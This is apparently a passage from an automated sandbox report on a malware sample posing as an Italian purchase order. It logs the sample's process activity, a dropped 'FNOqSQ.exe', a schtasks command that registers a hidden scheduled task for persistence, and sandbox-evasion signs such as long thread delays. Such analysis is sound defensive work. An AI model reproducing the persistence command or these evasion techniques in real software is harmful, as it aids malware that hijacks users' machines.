                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: PUK ITALIA PO 120610549.EXE.exe PID: 6104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: FNOqSQ.exe PID: 7584, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: D50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 76A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 86A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 8960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 9960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 76E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 86E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 8980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 9980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 1199969Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWindow / User API: threadDelayed 1670Jump to behavior
